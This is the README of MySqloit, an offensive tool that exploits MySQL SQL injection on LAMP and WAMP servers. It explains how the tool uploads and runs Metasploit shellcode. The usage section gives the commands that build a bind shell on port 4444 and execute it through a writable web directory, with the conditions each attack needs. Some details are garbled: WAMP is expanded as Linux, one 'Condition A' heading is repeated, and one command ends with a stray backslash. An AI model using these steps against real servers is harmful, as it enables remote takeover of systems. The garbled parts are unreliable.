Forked from: https://code.google.com/p/mysqloit/
MySqloit is a SQL Injection takeover tool focused on LAMP (Linux, Apache,MySql,PHP) and WAMP (Linux, Apache,MySql,PHP) platforms. It has an ability to upload and execute Metasploit shellcodes through the MySql SQL Injection vulnerability.
- Linux
- SQL Injection detection using time based injection method
- Database fingerprint
- Web server directory fingerprint
- Payload creation and execution
- FILE privilege
- Web server and database server must be in the same machine
- Prior knowledge of the web server directory
- For the LAMP platform, if the mysqld runs as a non root user, a writable web server directory is required
./mysqloit.py -h
Example:
Attacking LAMP
On the recent versions of MySQL, mysqld refuses to run as a root unless the user forces them. In this case, a writable web server directory is required
Condition A:
- mysqld runs as a root user
- web server directoy = /var/www
./mysqloit.py -p bind 4444
./mysqloit.py -e /var/www /
Condition B:
- mysqld runs as a non root user
- web server root directory = /var/www
- writable web server directory = /var/www/upload
./mysqloit.py -p bind 4444
./mysqloit.py -e /var/www /upload
Condition C:
- mysqld runs as a non root user
- web server root directory = /var/www
- writable web server directory = no writable directory
Exploit will fail
Condition A:
MySQL Windows always run as a LocalSystem. In this case, a writable web server directory is not required.
Condition A:
- web server directory = C:\Program Files\Apache2\htdocs\
./mysqloit -p bind 4444
./mysqloit -e bind 4444 'C:\Program Files\Apache2\htdocs\' \
email: muhaimindz@gmail.com
GPL v2